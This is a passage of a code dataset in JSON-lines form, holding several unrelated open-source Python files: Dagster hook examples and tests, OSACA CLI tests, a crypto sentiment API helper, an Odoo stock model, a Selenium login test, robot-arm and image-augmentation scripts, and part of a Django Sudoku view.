\"https://poloniex.com/public?command=returnOrderBook¤cyPair=BTC_NXT&depth=10\"\n #sources for crypto newsapi\n URL = \"https://poloniex.com/public?\"\n\n start_unix = mktime(datetime.strptime(start, \"%Y-%m-%d\").timetuple())\n end_unix = mktime(datetime.strptime(end, \"%Y-%m-%d\").timetuple())\n\n # defining a params dict for the parameters to be sent to the API\n PARAMS = {'command':\"returnChartData\", 'currencyPair': coin, 'start': start_unix, 'end': end_unix, 'period': period}\n # sending get request and saving the response as response object\n r = requests.get(url = URL, params = PARAMS)\n\n # extracting data in json format\n data = r.json()\n\n return data\n\n# Creates news, sent dictionary\ndef sent_dict(description, description_list, descending = True):\n\n sentiments = dict()\n\n for i in description:\n sentiments[i[\"description\"]] = GetSentiment(i[\"description\"])\n\n score_list = []\n\n for 
keys, value in sentiments.items():\n score_list.append(value)\n\n # sorted score list descending\n sorted_score = sorted(score_list, reverse = descending)\n # create dictionary object\n sorted_dict = dict()\n\n sorted_description = []\n\n for i in sorted_score:\n for key, value in sentiments.items(): # for name, age in list.items(): (for Python 3.x)\n if value == i:\n sorted_dict[key] = i\n sorted_description.append(key)\n\n # Returns an ordered dictionary from descending order of scores with a key as the description and the score as the value\n return sorted_dict, sorted_score, sorted_description\n\ndef score(data):\n # returns a list of strings\n\n list_score = []\n\n for i in data:\n list_score.append(str(GetSentiment(i[\"description\"])))\n\n return list_score\n\ndef coin_to_json(coin_data):\n\n x = []\n y = []\n\n for i in coin_data:\n t = datetime.fromtimestamp(i['date'])\n\n x.append(t.strftime('%Y-%m-%d'))\n y.append(i[\"close\"])\n\n plot_data = []\n\n for i in range(len(x)):\n plot_data.append({'x': x[i], 'y': y[i]})\n\n return json.dumps(plot_data)\n\ndef changes_bitcoin():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[0][\"percent_change_7d\"]\n percent_change_1h = results[0][\"percent_change_1h\"]\n percent_change_24h = results[0]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_ethereum():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[1][\"percent_change_7d\"]\n percent_change_1h = results[1][\"percent_change_1h\"]\n percent_change_24h = results[1]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_ripple():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[2][\"percent_change_7d\"]\n percent_change_1h = results[2][\"percent_change_1h\"]\n percent_change_24h = results[2]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_BTC_cash():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[3][\"percent_change_7d\"]\n percent_change_1h = results[3][\"percent_change_1h\"]\n percent_change_24h = results[3]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_LTC():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[6][\"percent_change_7d\"]\n percent_change_1h = results[6][\"percent_change_1h\"]\n percent_change_24h = results[6]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_Stellar():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = 
response.json()\n\n percent_change_7d = results[5][\"percent_change_7d\"]\n percent_change_1h = results[5][\"percent_change_1h\"]\n percent_change_24h = results[5]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n","repo_name":"hb2kang-zz/CryptoSent","sub_path":"crypto_django/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9879593867","text":"# ruff: isort: skip_file\nfrom unittest import mock\n\nimport yaml\nfrom dagster_slack import slack_resource\n\n# start_repo_marker_0\nfrom dagster import (\n HookContext,\n ResourceDefinition,\n failure_hook,\n file_relative_path,\n graph,\n job,\n op,\n repository,\n success_hook,\n)\n\n\n@success_hook(required_resource_keys={\"slack\"})\ndef slack_message_on_success(context: HookContext):\n message = f\"Op {context.op.name} finished successfully\"\n context.resources.slack.chat_postMessage(channel=\"#foo\", text=message)\n\n\n@failure_hook(required_resource_keys={\"slack\"})\ndef slack_message_on_failure(context: HookContext):\n message = f\"Op {context.op.name} failed\"\n context.resources.slack.chat_postMessage(channel=\"#foo\", text=message)\n\n\n# end_repo_marker_0\n\nslack_resource_mock = mock.MagicMock()\n\n\n@op\ndef a():\n pass\n\n\n@op\ndef b():\n raise Exception()\n\n\n# start_repo_marker_1\n@job(resource_defs={\"slack\": slack_resource}, hooks={slack_message_on_failure})\ndef notif_all():\n # the hook \"slack_message_on_failure\" is applied on every op instance within this graph\n a()\n b()\n\n\n# end_repo_marker_1\n\n\n# start_repo_marker_3\n@graph\ndef slack_notif_all():\n a()\n b()\n\n\nnotif_all_dev = slack_notif_all.to_job(\n name=\"notif_all_dev\",\n resource_defs={\n \"slack\": ResourceDefinition.hardcoded_resource(\n slack_resource_mock, \"do not send messages in dev\"\n )\n },\n hooks={slack_message_on_failure},\n)\n\nnotif_all_prod = slack_notif_all.to_job(\n name=\"notif_all_prod\",\n resource_defs={\"slack\": slack_resource},\n hooks={slack_message_on_failure},\n)\n\n\n# end_repo_marker_3\n\n\n# start_repo_marker_2\n@job(resource_defs={\"slack\": slack_resource})\ndef selective_notif():\n # only op \"a\" triggers hooks: a slack message will be sent when it fails or succeeds\n a.with_hooks({slack_message_on_failure, slack_message_on_success})()\n # op \"b\" won't trigger any hooks\n b()\n\n\n# end_repo_marker_2\n\n\n@repository\ndef repo():\n return [notif_all, selective_notif]\n\n\n# start_repo_main\nif __name__ == \"__main__\":\n prod_op_hooks_run_config_yaml = file_relative_path(__file__, \"prod_op_hooks.yaml\")\n with open(prod_op_hooks_run_config_yaml, \"r\", encoding=\"utf8\") as fd:\n run_config = yaml.safe_load(fd.read())\n\n notif_all_prod.execute_in_process(run_config=run_config, raise_on_error=False)\n# end_repo_main\n\n\n# start_testing_hooks\nfrom dagster import build_hook_context\n\n\n@success_hook(required_resource_keys={\"my_conn\"})\ndef my_success_hook(context):\n context.resources.my_conn.send(\"foo\")\n\n\ndef test_my_success_hook():\n my_conn = mock.MagicMock()\n # construct HookContext with mocked ``my_conn`` resource.\n context = build_hook_context(resources={\"my_conn\": my_conn})\n\n my_success_hook(context)\n\n assert my_conn.send.call_count == 1\n\n\n# end_testing_hooks\n\n\n# start_repo_marker_1_with_configured\n@job(\n resource_defs={\n \"slack\": slack_resource.configured(\n {\"token\": 
\"xoxp-1234123412341234-12341234-1234\"}\n )\n },\n hooks={slack_message_on_failure},\n)\ndef notif_all_configured():\n # the hook \"slack_message_on_failure\" is applied on every op instance within this graph\n a()\n b()\n\n\n# end_repo_marker_1_with_configured\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/concepts/ops_jobs_graphs/op_hooks.py","file_name":"op_hooks.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"2238293898","text":"#!/usr/bin/env python3\n\"\"\"\nUnit tests for the CLI of OSACA and running the sample kernels in examples/\n\"\"\"\n\nimport argparse\nimport os\nimport unittest\nfrom io import StringIO\nfrom shutil import copyfile\nfrom unittest.mock import patch\n\nimport osaca.osaca as osaca\nfrom osaca.db_interface import sanity_check\nfrom osaca.parser import ParserAArch64, ParserX86ATT\nfrom osaca.semantics import MachineModel\n\n\nclass ErrorRaisingArgumentParser(argparse.ArgumentParser):\n def error(self, message):\n raise ValueError(message) # reraise an error\n\n\nclass TestCLI(unittest.TestCase):\n ###########\n # Tests\n ###########\n\n def test_check_arguments(self):\n parser = osaca.create_parser(parser=ErrorRaisingArgumentParser())\n args = parser.parse_args([\"--arch\", \"WRONG_ARCH\", self._find_file(\"gs\", \"csx\", \"gcc\")])\n with self.assertRaises(ValueError):\n osaca.check_arguments(args, parser)\n args = parser.parse_args(\n [\n \"--arch\",\n \"csx\",\n \"--import\",\n \"WRONG_BENCH\",\n self._find_file(\"gs\", \"csx\", \"gcc\"),\n ]\n )\n with self.assertRaises(ValueError):\n osaca.check_arguments(args, parser)\n\n def test_import_data(self):\n parser = osaca.create_parser(parser=ErrorRaisingArgumentParser())\n args = parser.parse_args(\n [\n \"--arch\",\n \"tx2\",\n \"--import\",\n \"ibench\",\n self._find_test_file(\"ibench_import_aarch64.dat\"),\n ]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n args = parser.parse_args(\n [\n \"--arch\",\n \"tx2\",\n \"--import\",\n \"asmbench\",\n self._find_test_file(\"asmbench_import_aarch64.dat\"),\n ]\n )\n osaca.run(args, output_file=output)\n\n def test_check_db(self):\n parser = osaca.create_parser(parser=ErrorRaisingArgumentParser())\n args = parser.parse_args(\n [\n \"--arch\",\n \"tx2\",\n \"--db-check\",\n \"--verbose\",\n self._find_test_file(\"triad_x86_iaca.s\"),\n ]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n\n def test_get_parser(self):\n self.assertTrue(isinstance(osaca.get_asm_parser(\"csx\"), ParserX86ATT))\n self.assertTrue(isinstance(osaca.get_asm_parser(\"tx2\"), ParserAArch64))\n with self.assertRaises(ValueError):\n osaca.get_asm_parser(\"UNKNOWN\")\n\n def test_marker_insert_x86(self):\n # copy file to add markers\n name = self._find_test_file(\"kernel_x86.s\")\n name_copy = name + \".copy.s\"\n copyfile(name, name_copy)\n\n user_input = [\".L10\"]\n output = StringIO()\n parser = osaca.create_parser()\n args = parser.parse_args([\"--arch\", \"csx\", \"--insert-marker\", name_copy])\n with patch(\"builtins.input\", side_effect=user_input):\n osaca.run(args, output_file=output)\n\n lines_orig = len(open(name).readlines())\n lines_copy = len(open(name_copy).readlines())\n self.assertEqual(lines_copy, lines_orig + 5 + 4)\n # remove copy again\n os.remove(name_copy)\n\n def test_marker_insert_aarch64(self):\n # copy file to add markers\n name = self._find_test_file(\"kernel_aarch64.s\")\n name_copy = name 
+ \".copy.s\"\n copyfile(name, name_copy)\n\n user_input = [\".LBB0_32\", \"64\"]\n parser = osaca.create_parser()\n args = parser.parse_args([\"--arch\", \"tx2\", \"--insert-marker\", name_copy])\n with patch(\"builtins.input\", side_effect=user_input):\n osaca.run(args)\n\n lines_orig = len(open(name).readlines())\n lines_copy = len(open(name_copy).readlines())\n self.assertEqual(lines_copy, lines_orig + 3 + 2)\n # remove copy again\n os.remove(name_copy)\n\n def test_examples(self):\n kernels = [\n \"add\",\n \"copy\",\n \"daxpy\",\n \"gs\",\n \"j2d\",\n \"striad\",\n \"sum_reduction\",\n \"triad\",\n \"update\",\n ]\n archs = [\"csx\", \"tx2\", \"zen1\"]\n comps = {\"csx\": [\"gcc\", \"icc\"], \"tx2\": [\"gcc\", \"clang\"], \"zen1\": [\"gcc\"]}\n parser = osaca.create_parser()\n # Analyze all asm files resulting out of kernels, archs and comps\n for k in kernels:\n for a in archs:\n for c in comps[a]:\n with self.subTest(kernel=k, arch=a, comp=c):\n args = parser.parse_args(\n [\n \"--arch\",\n a,\n self._find_file(k, a, c),\n \"--export-graph\",\n \"/dev/null\",\n ]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(\"WARNING\" not in output.getvalue())\n\n def test_architectures(self):\n parser = osaca.create_parser()\n # Run the test kernel for all architectures\n archs = osaca.SUPPORTED_ARCHS\n for arch in archs:\n with self.subTest(micro_arch=arch):\n isa = MachineModel.get_isa_for_arch(arch)\n kernel = \"kernel_{}.s\".format(isa)\n args = parser.parse_args([\"--arch\", arch, self._find_test_file(kernel)])\n output = StringIO()\n osaca.run(args, output_file=output)\n\n def test_architectures_sanity(self):\n # Run sanity check for all architectures\n archs = osaca.SUPPORTED_ARCHS\n for arch in archs:\n with self.subTest(micro_arch=arch):\n out = StringIO()\n sanity = sanity_check(arch, verbose=2, output_file=out)\n self.assertTrue(sanity, msg=out)\n\n def test_without_arch(self):\n # Run test kernels without --arch flag\n parser = osaca.create_parser()\n # x86\n kernel_x86 = \"kernel_x86.s\"\n args = parser.parse_args([self._find_test_file(kernel_x86)])\n output = StringIO()\n osaca.run(args, output_file=output)\n # AArch64\n kernel_aarch64 = \"kernel_aarch64.s\"\n args = parser.parse_args([self._find_test_file(kernel_aarch64)])\n osaca.run(args, output_file=output)\n\n def test_user_warnings(self):\n parser = osaca.create_parser()\n kernel = \"triad_x86_unmarked.s\"\n args = parser.parse_args(\n [\"--arch\", \"csx\", \"--ignore-unknown\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n # WARNING for length\n self.assertTrue(\n output.getvalue().count(\n \"WARNING: You are analyzing a large amount of instruction forms\"\n )\n == 1\n )\n # WARNING for arch\n args = parser.parse_args(\n [\"--lines\", \"100-199\", \"--ignore-unknown\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(\n output.getvalue().count(\"WARNING: No micro-architecture was specified\") == 1\n )\n # WARNING for timeout\n args = parser.parse_args(\n [\"--ignore-unknown\", \"--lcd-timeout\", \"0\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(output.getvalue().count(\"WARNING: LCD analysis timed out\") == 1)\n args = parser.parse_args(\n [\"--ignore-unknown\", \"--lcd-timeout\", \"-1\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n 
self.assertTrue(output.getvalue().count(\"WARNING: LCD analysis timed out\") == 0)\n\n def test_lines_arg(self):\n # Run tests with --lines option\n parser = osaca.create_parser()\n kernel_x86 = \"triad_x86_iaca.s\"\n args_base = parser.parse_args([\"--arch\", \"csx\", self._find_test_file(kernel_x86)])\n output_base = StringIO()\n osaca.run(args_base, output_file=output_base)\n output_base = output_base.getvalue().split(\"\\n\")[8:]\n args = []\n args.append(\n parser.parse_args(\n [\n \"--lines\",\n \"146-154\",\n \"--arch\",\n \"csx\",\n self._find_test_file(kernel_x86),\n ]\n )\n )\n args.append(\n parser.parse_args(\n [\n \"--lines\",\n \"146:154\",\n \"--arch\",\n \"csx\",\n self._find_test_file(kernel_x86),\n ]\n )\n )\n args.append(\n parser.parse_args(\n [\n \"--lines\",\n \"146,147:148,149-154\",\n \"--arch\",\n \"csx\",\n self._find_test_file(kernel_x86),\n ]\n )\n )\n for a in args:\n with self.subTest(params=a):\n output = StringIO()\n osaca.run(a, output_file=output)\n self.assertEqual(output.getvalue().split(\"\\n\")[8:], output_base)\n\n ##################\n # Helper functions\n ##################\n\n @staticmethod\n def _find_file(kernel, arch, comp):\n testdir = os.path.dirname(__file__)\n name = os.path.join(\n testdir,\n \"../examples\",\n kernel,\n kernel + \".s.\" + arch[:3].lower() + \".\" + comp.lower() + \".s\",\n )\n if kernel == \"j2d\" and arch.lower() == \"csx\":\n name = name[:-1] + \"AVX.s\"\n assert os.path.exists(name)\n return name\n\n @staticmethod\n def _find_test_file(name):\n testdir = os.path.dirname(__file__)\n name = os.path.join(testdir, \"test_files\", name)\n assert os.path.exists(name)\n return name\n\n\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(TestCLI)\n unittest.TextTestRunner(verbosity=2, buffer=True).run(suite)\n","repo_name":"RRZE-HPC/OSACA","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":10452,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"53"} +{"seq_id":"9889928847","text":"import logging\n\nfrom dagster import AssetKey, DagsterInstance, observable_source_asset\nfrom dagster._core.definitions.asset_daemon_context import (\n AssetDaemonContext,\n get_auto_observe_run_requests,\n)\nfrom dagster._core.definitions.asset_daemon_cursor import AssetDaemonCursor\nfrom dagster._core.definitions.asset_graph import AssetGraph\nfrom pytest import fixture\n\n\ndef test_single_observable_source_asset_no_auto_observe():\n @observable_source_asset\n def asset1():\n ...\n\n asset_graph = AssetGraph.from_assets([asset1])\n\n assert (\n len(\n get_auto_observe_run_requests(\n asset_graph=asset_graph,\n current_timestamp=1000,\n last_observe_request_timestamp_by_asset_key={},\n run_tags={},\n )\n )\n == 0\n )\n\n assert (\n len(\n get_auto_observe_run_requests(\n asset_graph=asset_graph,\n current_timestamp=1000,\n last_observe_request_timestamp_by_asset_key={AssetKey(\"asset1\"): 1},\n run_tags={},\n )\n )\n == 0\n )\n\n\n@fixture\ndef single_auto_observe_source_asset_graph():\n @observable_source_asset(auto_observe_interval_minutes=30)\n def asset1():\n ...\n\n asset_graph = AssetGraph.from_assets([asset1])\n return asset_graph\n\n\ndef test_single_observable_source_asset_no_prior_observe_requests(\n single_auto_observe_source_asset_graph,\n):\n run_requests = get_auto_observe_run_requests(\n asset_graph=single_auto_observe_source_asset_graph,\n current_timestamp=1000,\n last_observe_request_timestamp_by_asset_key={},\n 
run_tags={},\n )\n assert len(run_requests) == 1\n run_request = run_requests[0]\n assert run_request.asset_selection == [AssetKey(\"asset1\")]\n\n\ndef test_single_observable_source_asset_prior_observe_requests(\n single_auto_observe_source_asset_graph,\n):\n last_timestamp = 1000\n\n run_requests = get_auto_observe_run_requests(\n asset_graph=single_auto_observe_source_asset_graph,\n current_timestamp=last_timestamp + 30 * 60 + 5,\n last_observe_request_timestamp_by_asset_key={AssetKey(\"asset1\"): last_timestamp},\n run_tags={},\n )\n assert len(run_requests) == 1\n run_request = run_requests[0]\n assert run_request.asset_selection == [AssetKey(\"asset1\")]\n\n\ndef test_single_observable_source_asset_prior_recent_observe_requests(\n single_auto_observe_source_asset_graph,\n):\n last_timestamp = 1000\n\n run_requests = get_auto_observe_run_requests(\n asset_graph=single_auto_observe_source_asset_graph,\n current_timestamp=last_timestamp + 30 * 60 - 5,\n last_observe_request_timestamp_by_asset_key={AssetKey(\"asset1\"): last_timestamp},\n run_tags={},\n )\n assert len(run_requests) == 0\n\n\ndef test_reconcile():\n @observable_source_asset(auto_observe_interval_minutes=30)\n def asset1():\n ...\n\n asset_graph = AssetGraph.from_assets([asset1])\n instance = DagsterInstance.ephemeral()\n\n run_requests, cursor, _ = AssetDaemonContext(\n evaluation_id=1,\n auto_observe=True,\n asset_graph=asset_graph,\n target_asset_keys=set(),\n instance=instance,\n cursor=AssetDaemonCursor.empty(),\n materialize_run_tags=None,\n observe_run_tags={\"tag1\": \"tag_value\"},\n respect_materialization_data_versions=False,\n logger=logging.getLogger(\"dagster.amp\"),\n ).evaluate()\n assert len(run_requests) == 1\n assert run_requests[0].tags.get(\"tag1\") == \"tag_value\"\n assert run_requests[0].asset_selection == [AssetKey([\"asset1\"])]\n assert cursor.last_observe_request_timestamp_by_asset_key[AssetKey([\"asset1\"])] > 0\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/definitions_tests/auto_materialize_tests/test_auto_observe.py","file_name":"test_auto_observe.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"8386116739","text":"import allure\nimport moment\nimport pytest\n\nfrom pages.homePage import HomePage\nfrom pages.loginPage import LoginPage\nfrom utils import utils\n\n\n@pytest.mark.usefixtures(\"test_setup\")\n\n\nclass TestLogin():\n\n # @pytest.fixture(scope='session') #run before all the test\n\n def test_login(self):\n #driver.get(\"https://opensource-demo.orangehrmlive.com\")\n driver = self.driver\n driver.get(utils.URL)\n login = LoginPage(driver)\n login.enter_username(utils.USERNAME)\n login.enter_password(utils.PASSWORD)\n login.click_login()\n # driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n # driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n # driver.find_element_by_id(\"btnLogin\").click()\n\n def test_logout(self):\n try:\n driver = self.driver\n logout = HomePage(driver)\n logout.click_welcome()\n logout.click_logout()\n x = driver.title\n assert x == \"OrangeHRM\"\n except AssertionError as error:\n print(\"Assertion error has occurred\")\n print(error)\n currentTime = moment.now().strftime(\"%H-%M-%S_%d-%m-%y\")\n testname = utils.whoami()\n screenshotname = testname+\"_\"+currentTime\n allure.attach(self.driver.get_screenshot_as_png(),name=screenshotname,\n 
attachment_type=allure.attachment_type.PNG)\n            driver.get_screenshot_as_file(\"C:/Users/sujan/PycharmProjects/POM-Projects/Aumation_Frame_Work1/screenshots/\"+screenshotname+\".PNG\")\n            raise\n        except:\n            print(\"There was an exception\")\n            raise\n        else:\n            print(\"No exception occurred\")\n        finally:\n            print(\"I am inside the finally block\")\n\n        # driver.find_element_by_id(\"welcome\").click()\n        # driver.find_element_by_link_text(\"Logout\").click()\n","repo_name":"sujaniw-spec/PythonAumation_Frame_Work1","sub_path":"tests/login_test.py","file_name":"login_test.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35917115348","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import ValidationError\n\n\nclass StockPicking(models.Model):\n    _name = \"stock.picking\"\n    _inherit = [\"stock.picking\", \"phone.validation.mixin\"]\n\n    cost = fields.Float(string=\"Cost\")\n    np_shipping_weight = fields.Float(string=\"Shipping Weight\")\n    np_shipping_volume = fields.Float(string=\"Shipping Volume\", digits=(10, 4))\n    np_length = fields.Integer(\n        string=\"Length (cm)\",\n        help=\"The cargo length (cm)\",\n    )\n    np_width = fields.Integer(\n        string=\"Width (cm)\",\n        help=\"The cargo width (cm)\",\n    )\n    np_height = fields.Integer(\n        string=\"Height (cm)\",\n        help=\"The cargo height (cm)\",\n    )\n    comment = fields.Text(related=\"sale_id.note\", string=\"Comment\")\n    afterpayment_check = fields.Boolean(string=\"Afterpayment check\", default=False)\n\n    biko_recipient_id = fields.Many2one(\n        \"res.partner\",\n        string=\"Recipient person\",\n        store=True,\n        compute=\"_compute_biko_recipient_id\",\n        inverse=\"_inverse_biko_recipient_id\",\n    )\n    biko_recipient_mobile = fields.Char(\n        string=\"Mobile\",\n        related=\"biko_recipient_id.mobile\",\n        readonly=False,\n    )\n\n    biko_1c_phone = fields.Char(\n        string=\"1C phone\",\n        related=\"biko_recipient_id.biko_1c_phone\",\n    )\n\n    biko_dropshipping = fields.Boolean(string=\"Dropshipping\")\n\n    biko_carrier_id = fields.Many2one(\n        \"delivery.carrier\",\n        string=\"Delivery carrier\",\n        # store=True,\n        readonly=True,\n        related=\"sale_id.carrier_id\",\n    )\n\n    def _inverse_biko_recipient_id(self):\n        for stock in self:\n            if stock.sale_id:\n                sale_order = stock.sale_id\n                sale_order.update({\"biko_recipient_id\": stock.biko_recipient_id})\n\n    @api.onchange(\"biko_recipient_mobile\")\n    def _onchange_phone_validation(self):\n        if self.biko_recipient_mobile:\n            self.biko_recipient_mobile = self.phone_format(self.biko_recipient_mobile)\n\n    @api.depends(\"sale_id\")\n    def _compute_biko_recipient_id(self):\n        for stock in self:\n            stock.update({\"biko_recipient_id\": stock.sale_id.biko_recipient_id})\n\n    @api.constrains(\"afterpayment_check\", \"backward_money\")\n    def _check_backward(self):\n        for data in self:\n            if data.backward_money and data.afterpayment_check:\n                raise ValidationError(\n                    _(\n                        \"You can choose only single option, \"\n                        '\"Backward\" or \"After payment\".'\n                    )\n                )\n","repo_name":"BorovlevAS/muztorg","sub_path":"biko_np_patch/models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"15029784525","text":"import matplotlib as mpl\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pickle as pkl\n\nNULL = object()\n\ndef plot_2d(preds, shape, mask=NULL, 
clim=2, cbar=True):\n bounds_x1 = (-8, +8)\n bounds_x2 = (-2, +20)\n minima, maxima = -clim, +clim\n norm = mpl.colors.Normalize(vmin=minima, vmax=maxima, clip=False)\n cmap = cm.bwr\n cmap.set_bad(color='gray')\n mapper = cm.ScalarMappable(norm=norm, cmap=cmap)\n if mask is not NULL:\n preds = preds.copy()\n preds[~mask] = np.nan\n plt.imshow(preds.reshape(*(shape[::-1])),\n origin='lower',\n cmap=cmap, norm=norm,\n extent=(*bounds_x1, *bounds_x2),\n )\n plt.gca().invert_yaxis()\n if cbar:\n plt.colorbar()\n plt.axhline(0, color='k', linewidth=0.5)\n plt.axvline(0, color='k', linewidth=0.5)\n plt.xticks([-5, 0, +5])\n plt.yticks([0, 5, 10, 15, 20])\n return plt\n\n\n\nest_dir = '../pipeline-gridded/Estimates/'\npredmat = pkl.load(open(f'{est_dir}/TPS_Preds_Block_0.5_Hur.pkl', 'rb'))\nshape = (100, 400)\n\ndepth_idx = 3\nplot_2d(predmat[:, depth_idx], shape, cbar=False)\nplt.savefig('test.pdf', bbox_inches='tight')\n\n","repo_name":"jacoposala29/ARGO_code_JS","sub_path":"Codes_pipeline/implementations/plot_sample.py","file_name":"plot_sample.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39424678941","text":"from PIL import Image, ImageEnhance\r\nimport os\r\nimport random\r\nimport time\r\n\r\nimage_path = \"large.jpg\"\r\nimage = Image.open(image_path)\r\n\r\nsize = (32, 32)\r\nimage = image.resize(size)\r\n# Define the augmentation parameters\r\nrotation_angles = [-15, -10, -5, 0, 5, 10, 15]\r\nbrightness_factors = [0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3]\r\ncontrast_factors = [0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3]\r\n\r\n# Create the output directory\r\noutput_dir = \"augmented_images\"\r\nif not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n# Apply the augmentations and save the resulting images\r\nfor i in range(200):\r\n # Randomly select the augmentation parameters\r\n rotation_angle = random.choice(rotation_angles)\r\n brightness_factor = random.choice(brightness_factors)\r\n contrast_factor = random.choice(contrast_factors)\r\n # Apply the augmentations\r\n augmented_image = image.rotate(rotation_angle)\r\n augmented_image = ImageEnhance.Brightness(augmented_image).enhance(brightness_factor)\r\n augmented_image = ImageEnhance.Contrast(augmented_image).enhance(contrast_factor)\r\n # Save the resulting image with a timestamp in the filename\r\n timestamp = time.strftime(\"%Y%m%d_%H%M%S\")\r\n output_path = os.path.join(output_dir, f\"augmented_image_{i}_{timestamp}.jpg\")\r\n augmented_image.save(output_path)\r\n","repo_name":"seriousGOODMAN/ADAS-Projects","sub_path":"imageAUG.py","file_name":"imageAUG.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72567420967","text":"from serial.tools import list_ports\nimport threading\nimport time\nfrom pydobot import Dobot\n\nport = list_ports.comports()[0].device\ndevice = Dobot(port=port, verbose=False)\nstate = True\ndef job():\n global state\n while(state):\n print(device.pose())\n time.sleep(0.01)\nt = threading.Thread(target = job)\n\n# 執行該子執行緒\n\n(x, y, z, r, j1, j2, j3, j4) = device.pose()\n#print(f'x:{x} y:{y} z:{z} j1:{j1} j2:{j2} j3:{j3} j4:{j4}')\nt.start()\nfor i in range(1):\n device.move_to(x+100 , y, z, r, wait=False)\n device.move_to(x, y, z, r, wait=True) # we wait until this movement is done before continuing\n #device.move_to(x , y + 40, z, r, wait=True) # we wait until this movement is done before 
continuing\n #device.move_to(x , y, z, r, wait=False)\n #device.move_to()\nstate = False\nt.join()\ndevice.close()\n\nprint(\"Done.\")","repo_name":"harry123180/opencv_find_objects","sub_path":"GMTCV/單一動作.py","file_name":"單一動作.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1672581409","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport json\nimport random\nfrom math import sqrt\n\nfrom django.http import JsonResponse, Http404\nfrom django.views.generic.base import TemplateView\nfrom django.template.loader import render_to_string\n\nfrom common.checker import Checker\nfrom play.models import Puzzle, PuzzleValue\n\n\nclass PlayView(TemplateView):\n \"\"\"Django class-based view for playing Sudoku.\"\"\"\n\n template_name = 'play/play.html'\n puzzle_id = None\n\n def __init__(self, **kwargs):\n \"\"\"Initialize a new `PlayView` instance.\"\"\"\n super(PlayView, self).__init__(**kwargs)\n\n def get(self, request, *args, **kwargs):\n \"\"\"Render `PlayView` instance.\"\"\"\n context = self.get_context_data(**kwargs)\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n \"\"\"Get context data for new puzzles.\"\"\"\n\n # If we have an ID from the get request, use that.\n # Otherwise get a random puzzle.\n puzzle_id = self.kwargs.get('puzzle_id', None)\n if puzzle_id is None:\n # Get a random Puzzle id from the DB\n puzzle_id = self._get_random_puzzle()\n\n # return the puzzle once we get and format its context from the DB.\n return self._build_puzzle(puzzle_id)\n\n def _get_random_puzzle(self, difficulty=None):\n \"\"\"Get a random Puzzle id from the DB\"\"\"\n available_puzzles = 